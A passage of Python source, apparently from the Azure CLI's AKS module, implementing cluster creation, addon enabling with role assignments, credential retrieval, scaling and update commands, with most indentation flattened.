service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(CONST_MONITORING_ADDON_NAME in result.addon_profiles) and
(hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME], 'identity')) and
(hasattr(
result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity, 'object_id'))
):
logger.info('omsagent MSI exists, using it')
service_principal_msi_id = result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd, 'Monitoring Metrics Publisher',
service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
else:
        logger.warning('Could not find service principal or user assigned MSI for role '
                       'assignment')
def _add_ingress_appgw_addon_role_assignment(result, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id != 'msi'
):
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(CONST_INGRESS_APPGW_ADDON_NAME in result.addon_profiles) and
(hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME], 'identity')) and
(hasattr(
result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity, 'object_id'))
):
service_principal_msi_id = result.addon_profiles[
CONST_INGRESS_APPGW_ADDON_NAME].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
config = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config
from msrestazure.tools import parse_resource_id, resource_id
if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in config:
appgw_id = config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
parsed_appgw_id = parse_resource_id(appgw_id)
appgw_group_id = resource_id(subscription=parsed_appgw_id["subscription"],
resource_group=parsed_appgw_id["resource_group"])
if not _add_role_assignment(cmd, 'Contributor',
service_principal_msi_id, is_service_principal, scope=appgw_group_id):
logger.warning('Could not create a role assignment for application gateway: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', appgw_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_ID in config:
subnet_id = config[CONST_INGRESS_APPGW_SUBNET_ID]
if not _add_role_assignment(cmd, 'Network Contributor',
service_principal_msi_id, is_service_principal, scope=subnet_id):
logger.warning('Could not create a role assignment for subnet: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', subnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_CIDR in config:
if result.agent_pool_profiles[0].vnet_subnet_id is not None:
parsed_subnet_vnet_id = parse_resource_id(
result.agent_pool_profiles[0].vnet_subnet_id)
vnet_id = resource_id(subscription=parsed_subnet_vnet_id["subscription"],
resource_group=parsed_subnet_vnet_id["resource_group"],
namespace="Microsoft.Network",
type="virtualNetworks",
name=parsed_subnet_vnet_id["name"])
if not _add_role_assignment(cmd, 'Contributor',
service_principal_msi_id, is_service_principal, scope=vnet_id):
logger.warning('Could not create a role assignment for virtual network: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', vnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
def _add_virtual_node_role_assignment(cmd, result, vnet_subnet_id):
# Remove trailing "/subnets/<SUBNET_NAME>" to get the vnet id
vnet_id = vnet_subnet_id.rpartition('/')[0]
vnet_id = vnet_id.rpartition('/')[0]
service_principal_msi_id = None
is_service_principal = False
os_type = 'Linux'
addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id.lower() != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(addon_name in result.addon_profiles) and
(hasattr(result.addon_profiles[addon_name], 'identity')) and
(hasattr(result.addon_profiles[addon_name].identity, 'object_id'))
):
logger.info('virtual node MSI exists, using it')
service_principal_msi_id = result.addon_profiles[addon_name].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd, 'Contributor',
service_principal_msi_id, is_service_principal, scope=vnet_id):
logger.warning('Could not create a role assignment for virtual node addon. '
'Are you an Owner on this subscription?')
else:
        logger.warning('Could not find service principal or user assigned MSI for role '
                       'assignment')
# pylint: disable=too-many-statements,too-many-branches
def aks_create(cmd, client, resource_group_name, name, ssh_key_value, # pylint: disable=too-many-locals
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_type=None,
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
uptime_sla=False,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
vnet_subnet_id=None,
ppg=None,
max_pods=0,
min_count=None,
max_count=None,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
api_server_authorized_ip_ranges=None,
enable_private_cluster=False,
private_dns_zone=None,
fqdn_subdomain=None,
enable_managed_identity=True,
assign_identity=None,
attach_acr=None,
enable_aad=False,
aad_admin_group_object_ids=None,
aci_subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_encryption_at_host=False,
assign_kubelet_identity=None,
enable_ultra_ssd=False,
edge_zone=None,
no_wait=False,
yes=False,
enable_azure_rbac=False):
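    # resolve SDK model classes through get_models so this command tracks the API version selected for ResourceType.MGMT_CONTAINERSERVICE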
ManagedClusterWindowsProfile = cmd.get_models('ManagedClusterWindowsProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterSKU = cmd.get_models('ManagedClusterSKU',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ContainerServiceNetworkProfile = cmd.get_models('ContainerServiceNetworkProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ContainerServiceLinuxProfile = cmd.get_models('ContainerServiceLinuxProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterServicePrincipalProfile = cmd.get_models('ManagedClusterServicePrincipalProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ContainerServiceSshConfiguration = cmd.get_models('ContainerServiceSshConfiguration',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ContainerServiceSshPublicKey = cmd.get_models('ContainerServiceSshPublicKey',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterAADProfile = cmd.get_models('ManagedClusterAADProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterAgentPoolProfile = cmd.get_models('ManagedClusterAgentPoolProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterIdentity = cmd.get_models('ManagedClusterIdentity',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
UserAssignedIdentity = cmd.get_models(
'UserAssignedIdentity',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedCluster = cmd.get_models('ManagedCluster',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedServiceIdentityUserAssignedIdentitiesValue = cmd.get_models(
'ManagedServiceIdentityUserAssignedIdentitiesValue',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
_validate_ssh_key(no_ssh_key, ssh_key_value)
subscription_id = get_subscription_id(cmd.cli_ctx)
if dns_name_prefix and fqdn_subdomain:
raise MutuallyExclusiveArgumentError(
'--dns-name-prefix and --fqdn-subdomain cannot be used at same time')
if not dns_name_prefix and not fqdn_subdomain:
dns_name_prefix = _get_default_dns_prefix(
name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = set_load_balancer_sku(
load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError(
'--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
# Must be 12 chars or less before ACS RP adds to it
name=_trim_nodepoolname(nodepool_name),
tags=nodepool_tags,
node_labels=nodepool_labels,
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
vnet_subnet_id=vnet_subnet_id,
proximity_placement_group_id=ppg,
availability_zones=zones,
enable_node_public_ip=enable_node_public_ip,
node_public_ip_prefix_id=node_public_ip_prefix_id,
enable_encryption_at_host=enable_encryption_at_host,
enable_ultra_ssd=enable_ultra_ssd,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type,
mode="System"
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool_profile.os_disk_type = node_osdisk_type
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(
admin_username=admin_username, ssh=ssh_config)
windows_profile = None
if windows_admin_username or windows_admin_password:
# Guard against windows_admin_password being set while windows_admin_username is not
if windows_admin_username is None:
try:
from knack.prompting import prompt
windows_admin_username = prompt('windows_admin_username: ')
# Validation of admin_username in ManagedClusterWindowsProfile will still fail
# if the user sets windows_admin_username to an empty string here
except NoTTYException:
raise CLIError(
'Please specify username for Windows in non-interactive mode.')
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(
msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError(
'Please specify both username and password in non-interactive mode.')
windows_license_type = None
if enable_ahub:
windows_license_type = 'Windows_Server'
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password,
license_type=windows_license_type)
# If customer explicitly provide a service principal, disable managed identity.
if service_principal and client_secret:
enable_managed_identity = False
# Skip create service principal profile for the cluster if the cluster
# enables managed identity and customer doesn't explicitly provide a service principal.
service_principal_profile = None
principal_obj = None
if not (enable_managed_identity and not service_principal and not client_secret):
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
fqdn_subdomain=fqdn_subdomain, location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"),
key_vault_secret_ref=None)
need_post_creation_vnet_permission_granting = False
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd, vnet_subnet_id)):
# if service_principal_profile is None, then this cluster is an MSI cluster,
# and the service principal does not exist. Two cases:
# 1. For system assigned identity, we just tell user to grant the
# permission after the cluster is created to keep consistent with portal experience.
# 2. For user assigned identity, we can grant needed permission to
# user provided user assigned identity before creating managed cluster.
if service_principal_profile is None and not assign_identity:
msg = ('It is highly recommended to use USER assigned identity '
'(option --assign-identity) when you want to bring your own '
'subnet, which will have no latency for the role assignment to '
'take effect. When using SYSTEM assigned identity, '
'azure-cli will grant Network Contributor role to the '
'system assigned identity after the cluster is created, and '
'the role assignment will take some time to take effect, see '
'https://docs.microsoft.com/en-us/azure/aks/use-managed-identity, '
'proceed to create cluster with system assigned identity?')
if not yes and not prompt_y_n(msg, default="n"):
return None
need_post_creation_vnet_permission_granting = True
else:
scope = vnet_subnet_id
identity_client_id = ""
if assign_identity:
identity_client_id = _get_user_assigned_identity_client_id(
cmd.cli_ctx, assign_identity)
else:
identity_client_id = service_principal_profile.client_id
if not _add_role_assignment(cmd, 'Network Contributor',
identity_client_id, scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = create_load_balancer_profile(
cmd,
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
if attach_acr:
if enable_managed_identity:
if no_wait:
raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
'--no-wait is not allowed, please wait until the whole operation succeeds.')
# Attach acr operation will be handled after the cluster is created
else:
_ensure_aks_acr(cmd,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
outbound_type = _set_outbound_type(
outbound_type, vnet_subnet_id, load_balancer_sku, load_balancer_profile)
network_profile = None
if any([network_plugin, pod_cidr, service_cidr, dns_service_ip,
docker_bridge_address, network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError(
'Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type,
)
if load_balancer_sku.lower() == "basic":
network_profile = ContainerServiceNetworkProfile(
load_balancer_sku=load_balancer_sku.lower(),
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id,
aci_subnet_name,
vnet_subnet_id,
appgw_name,
appgw_subnet_cidr,
appgw_id,
appgw_subnet_id,
appgw_watch_namespace,
enable_sgxquotehelper
)
monitoring = False
if CONST_MONITORING_ADDON_NAME in addon_profiles:
monitoring = True
_ensure_container_insights_for_monitoring(
cmd, addon_profiles[CONST_MONITORING_ADDON_NAME])
# addon is in the list and is enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in addon_profiles and \
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
enable_virtual_node = False
if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in addon_profiles:
enable_virtual_node = True
aad_profile = None
if enable_aad:
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('"--enable-aad" cannot be used together with '
'"--aad-client-app-id/--aad-server-app-id/--aad-server-app-secret"')
if disable_rbac and enable_azure_rbac:
raise ArgumentUsageError(
'"--enable-azure-rbac" can not be used together with "--disable-rbac"')
aad_profile = ManagedClusterAADProfile(
managed=True,
enable_azure_rbac=enable_azure_rbac,
# ids -> i_ds due to track 2 naming issue
admin_group_object_i_ds=_parse_comma_separated_list(
aad_admin_group_object_ids),
tenant_id=aad_tenant_id
)
else:
if enable_azure_rbac is True:
raise ArgumentUsageError(
'"--enable-azure-rbac" can only be used together with "--enable-aad"')
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]):
if aad_tenant_id is None:
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
api_server_access_profile = None
if enable_private_cluster and load_balancer_sku.lower() != "standard":
raise CLIError("Please use standard load balancer for private cluster")
if api_server_authorized_ip_ranges or enable_private_cluster:
api_server_access_profile = _populate_api_server_access_profile(
cmd,
api_server_authorized_ip_ranges,
enable_private_cluster=enable_private_cluster
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError(
'specify either "--disable-rbac" or "--enable-rbac", not both.')
identity = None
if not enable_managed_identity and assign_identity:
raise ArgumentUsageError(
'--assign-identity can only be specified when --enable-managed-identity is specified')
if enable_managed_identity and not assign_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
elif enable_managed_identity and assign_identity:
user_assigned_identity = {
# pylint: disable=line-too-long
assign_identity: ManagedServiceIdentityUserAssignedIdentitiesValue()
}
identity = ManagedClusterIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identity
)
identity_profile = None
if assign_kubelet_identity:
if not assign_identity:
# pylint: disable=line-too-long
raise ArgumentUsageError('--assign-kubelet-identity can only be specified when --assign-identity is specified')
kubelet_identity = _get_user_assigned_identity(cmd.cli_ctx, assign_kubelet_identity)
identity_profile = {
# pylint: disable=line-too-long
'kubeletidentity': UserAssignedIdentity(
resource_id=assign_kubelet_identity,
client_id=kubelet_identity.client_id,
object_id=kubelet_identity.principal_id
)
}
cluster_identity_object_id = _get_user_assigned_identity_object_id(cmd.cli_ctx, assign_identity)
# ensure the cluster identity has "Managed Identity Operator" role at the scope of kubelet identity
_ensure_cluster_identity_permission_on_kubelet_identity(
cmd,
cluster_identity_object_id,
assign_kubelet_identity)
mc = ManagedCluster(
location=location,
tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=not disable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
auto_scaler_profile=cluster_autoscaler_profile,
api_server_access_profile=api_server_access_profile,
identity=identity,
disk_encryption_set_id=node_osdisk_diskencryptionset_id,
identity_profile=identity_profile
)
use_custom_private_dns_zone = False
if private_dns_zone:
if not enable_private_cluster:
raise InvalidArgumentValueError("Invalid private dns zone for public cluster. "
"It should always be empty for public cluster")
mc.api_server_access_profile.private_dns_zone = private_dns_zone
from msrestazure.tools import is_valid_resource_id
if private_dns_zone.lower() != CONST_PRIVATE_DNS_ZONE_SYSTEM:
if is_valid_resource_id(private_dns_zone):
use_custom_private_dns_zone = True
else:
raise InvalidArgumentValueError(
private_dns_zone + " is not a valid Azure resource ID.")
if fqdn_subdomain:
if not use_custom_private_dns_zone:
raise ArgumentUsageError("--fqdn-subdomain should only be used for "
"private cluster with custom private dns zone")
mc.fqdn_subdomain = fqdn_subdomain
if uptime_sla:
mc.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
if edge_zone:
ExtendedLocation = cmd.get_models('ExtendedLocation',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ExtendedLocationTypes = cmd.get_models('ExtendedLocationTypes',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
mc.extended_location = ExtendedLocation(
name=edge_zone,
type=ExtendedLocationTypes.EDGE_ZONE
)
# Add AAD session key to header.
# If principal_obj is None, we do not add this header; this can happen
# when the cluster enables managed identity. In that case the header is
# not needed, so it is fine to omit it.
custom_headers = None
if principal_obj:
custom_headers = {
'Ocp-Aad-Session-Key': principal_obj.get("aad_session_key")}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
created_cluster = _put_managed_cluster_ensuring_permission(
cmd,
client,
subscription_id,
resource_group_name,
name,
mc,
monitoring,
ingress_appgw_addon_enabled,
enable_virtual_node,
need_post_creation_vnet_permission_granting,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
custom_headers,
no_wait)
return created_cluster
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
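"""Disable the given comma-separated addons on an existing managed cluster and send the update."""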
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
no_wait=False):
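"""Enable the given comma-separated addons on an existing managed cluster.

Waits for the update when a newly enabled addon (monitoring, ingress-appgw,
virtual-node) needs a follow-up role assignment; otherwise honors --no-wait.
"""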
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id,
subnet_name=subnet_name,
appgw_name=appgw_name,
appgw_subnet_cidr=appgw_subnet_cidr,
appgw_id=appgw_id,
appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace,
enable_sgxquotehelper=enable_sgxquotehelper,
no_wait=no_wait)
enable_monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles \
and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles \
and instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
virtual_node_addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
enable_virtual_node = (virtual_node_addon_name in instance.addon_profiles and
instance.addon_profiles[virtual_node_addon_name].enabled)
need_pull_for_result = enable_monitoring or ingress_appgw_addon_enabled or enable_virtual_node
if need_pull_for_result:
if enable_monitoring:
_ensure_container_insights_for_monitoring(
cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME])
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(
client.begin_create_or_update(resource_group_name, name, instance))
if enable_monitoring:
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(
result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(result, cmd)
if enable_virtual_node:
# All agent pools reside in the same vnet, and a later function grants the
# Contributor role at the vnet level, so using any agent pool here is fine.
random_agent_pool = result.agent_pool_profiles[0]
if random_agent_pool.vnet_subnet_id != "":
_add_virtual_node_role_assignment(
cmd, result, random_agent_pool.vnet_subnet_id)
# Otherwise the cluster is not using a custom VNet; the permission is already
# granted by the AKS RP, so there is nothing to handle on the client side.
else:
result = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, name, instance)
return result
def aks_get_versions(cmd, client, location):
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
overwrite_existing=False, context_name=None):
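"""Fetch admin or user credentials for the cluster and print or merge the kubeconfig into `path` (or $KUBECONFIG).

Illustrative CLI invocation (names are placeholders):
    az aks get-credentials -g MyResourceGroup -n MyCluster --admin
"""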
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(
resource_group_name, name)
else:
credentialResults = client.list_cluster_user_credentials(
resource_group_name, name)
# Check if the KUBECONFIG environment variable is set
# If the path differs from the default, -f/--file was passed,
# in which case we ignore the KUBECONFIG variable
if "KUBECONFIG" in os.environ and path == os.path.join(os.path.expanduser('~'), '.kube', 'config'):
path = os.environ["KUBECONFIG"]
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(
encoding='UTF-8')
_print_or_merge_credentials(
path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
def aks_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_nulls(list(managed_clusters))
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def aks_update_credentials(cmd, client, resource_group_name, name,
reset_service_principal=False,
reset_aad=False,
service_principal=None,
client_secret=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_client_app_id=None,
aad_tenant_id=None,
no_wait=False):
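"""Reset either the service principal profile or the (legacy) AAD profile of the cluster."""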
ManagedClusterServicePrincipalProfile = cmd.get_models('ManagedClusterServicePrincipalProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
if bool(reset_service_principal) == bool(reset_aad):
raise CLIError(
'usage error: --reset-service-principal | --reset-aad-profile')
if reset_service_principal:
if service_principal is None or client_secret is None:
raise CLIError(
'usage error: --reset-service-principal --service-principal ID --client-secret SECRET')
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=service_principal, secret=client_secret
)
return sdk_no_wait(no_wait,
client.begin_reset_service_principal_profile,
resource_group_name,
name, service_principal_profile)
if not all([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('usage error: --reset-aad --aad-client-app-id ID --aad-server-app-id ID '
'--aad-server-app-secret SECRET [--aad-tenant-id ID]')
parameters = {
'clientAppID': aad_client_app_id,
'serverAppID': aad_server_app_id,
'serverAppSecret': aad_server_app_secret,
'tenantID': aad_tenant_id
}
return sdk_no_wait(no_wait,
client.begin_reset_aad_profile,
resource_group_name,
name, parameters)
def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False):
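"""Scale the node count of a single node pool; fails if the targeted pool has the cluster autoscaler enabled."""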
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There is more than one node pool in the cluster. '
'Please specify the nodepool name or use the "az aks nodepool" command to scale a node pool.')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError(
"Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
# pylint: disable=inconsistent-return-statements
def aks_update(cmd, client, resource_group_name, name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None,
uptime_sla=False,
no_uptime_sla=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
attach_acr=None,
detach_acr=None,
api_server_authorized_ip_ranges=None,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
enable_ahub=False,
disable_ahub=False,
windows_admin_password=None,
enable_managed_identity=False,
assign_identity=None,
yes=False,
no_wait=False,
enable_azure_rbac=False,
disable_azure_rbac=False):
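"""Update mutable cluster settings (autoscaler, load balancer, ACR, AAD, SKU, identity, ...).

At least one update flag must be supplied; the function validates flag combinations,
patches the retrieved ManagedCluster in place, and sends it back to the service.
"""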
ManagedClusterSKU = cmd.get_models('ManagedClusterSKU',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterAADProfile = cmd.get_models('ManagedClusterAADProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterIdentity = cmd.get_models('ManagedClusterIdentity',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedServiceIdentityUserAssignedIdentitiesValue = cmd.get_models(
'ManagedServiceIdentityUserAssignedIdentitiesValue',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
update_autoscaler = enable_cluster_autoscaler + \
disable_cluster_autoscaler + update_cluster_autoscaler
update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
